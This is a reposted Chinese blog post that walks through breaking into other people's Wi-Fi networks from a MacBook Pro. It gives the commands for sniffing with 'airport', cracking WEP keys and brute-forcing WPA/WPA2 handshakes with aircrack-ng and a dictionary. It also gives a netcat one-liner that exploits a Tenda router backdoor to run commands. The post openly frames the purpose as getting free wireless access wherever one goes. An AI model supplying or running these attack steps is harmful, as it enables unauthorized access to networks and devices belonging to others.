您的位置:首页 > 理论基础 > 计算机网络

利用MacBookPro入侵无线网络

2014-05-05 20:25 162 查看
目前无线网络的加密方式主要有WEP,WPA/WPA2。这是最常看到的加密方式,最近由于需要,专门去研究了一下如何入侵无线网络。

1、入侵WEP加密的无线网络

WEP加密方式现在已经很不安全了,因为只要通过一定量的数据包,就可以穷举出密码,无论密码多么复杂,也最多需要几分钟而已。

WEP的秘钥分为5位和13位。

入侵主要流程:

1)先查看附近的wifi信号

airport -s


2)选定其中一个wifi信号,看到其所在的频道,开始监听抓包

sudo airport en0 sniff 11


en0 代表无线网卡,11代表要监听的无线信号在11频道上,此时笔记本进入了监听阶段,抓到的包保存为/tmp/airportSniffxxxxx.cap

3)此时我们可以一边抓包,一边进行解密

aircrack-ng -1 -a 1 -e xx:xx:xx:xx:xx:xx /tmp/airportSniffxxxxx.cap


-e 代表目的MAC地址

-a 1 代表使用WEP破解方式

只要包到达了一定数量,密码很快就出来了。

注:对于13位的WEP,需要等多的数据包,例外,在数据包足够多时,但是又破解不出来的时候,可以尝试下提高 -f 影响因子的大小(默认为2),可以尝试提高到1024等。

2、入侵WPA/WPA2加密的无线网络

WPA/WPA2相对于WEP来说安全了很多,但是也存在着很大的隐患,虽然不会像WEP那样通过数据包直接分析出来了,但是需要获得了一次handshake,就可以用过字典暴力破解的方法获得秘钥。现在网上不管是弱密码还是已有的泄露的密码,都能找到很多,搜集整理出来一份很好地字典就能走到哪里都有无线可以蹭了。

入侵主要流程:

1)先查看附近的wifi信号

airport -s


2)选定其中一个wifi信号,看到其所在的频道,开始监听抓包

sudo airport en0 sniff 11


en0 代表无线网卡,11代表要监听的无线信号在11频道上,此时笔记本进入了监听阶段,抓到的包保存为/tmp/airportSniffxxxxx.cap

3)此时我们可以一边抓包,一边进行解密

aircrack-ng -w password.txt -e xx:xx:xx:xx:xx:xx /tmp/airportSniffxxxxx.cap


-w 后面代表字典文件

只要拥有一个handshake,就可以开始跑字典破解了。handshake是在监听阶段,有用户重新连接到无线上,就是一个handshake。

3、Tenda路由器后门利用

echo -ne "w302r_mfg\x00x/bin/ls" | nc -u -q 5 192.168.0.1 7329


漏洞原理及利用:http://netsecurity.51cto.com/art/201310/413552.htm
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: